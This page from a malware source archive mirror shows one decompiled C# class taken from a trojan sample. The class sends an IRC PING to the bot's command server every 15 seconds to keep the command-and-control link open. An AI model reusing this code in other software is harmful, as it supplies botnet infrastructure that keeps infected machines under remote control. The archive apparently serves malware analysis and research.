mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 03:16:11 +00:00
f2ac1ece55
add
31 lines
848 B
C#
31 lines
848 B
C#
// Decompiled with JetBrains decompiler
|
|
// Type: Refx.PingSender
|
|
// Assembly: Refx, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 5DD4C44F-C748-4813-B398-D3DE520CF41A
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Fsysna.bezr-e553a7902dd2b2c973a97028cc8dc7f1bb82c18b1266abf90d2140ec0b5b3a01.exe
|
|
|
|
using System.Threading;
|
|
|
|
namespace Refx
|
|
{
|
|
internal class PingSender
|
|
{
|
|
private static string PING = "PING :";
|
|
private Thread pingSender;
|
|
|
|
public PingSender() => this.pingSender = new Thread(new ThreadStart(this.Run));
|
|
|
|
public void Start() => this.pingSender.Start();
|
|
|
|
public void Run()
|
|
{
|
|
while (true)
|
|
{
|
|
clsIRC.Writer.WriteLine(PingSender.PING + clsIRC.SERVER);
|
|
clsIRC.Writer.Flush();
|
|
Thread.Sleep(15000);
|
|
}
|
|
}
|
|
}
|
|
}
|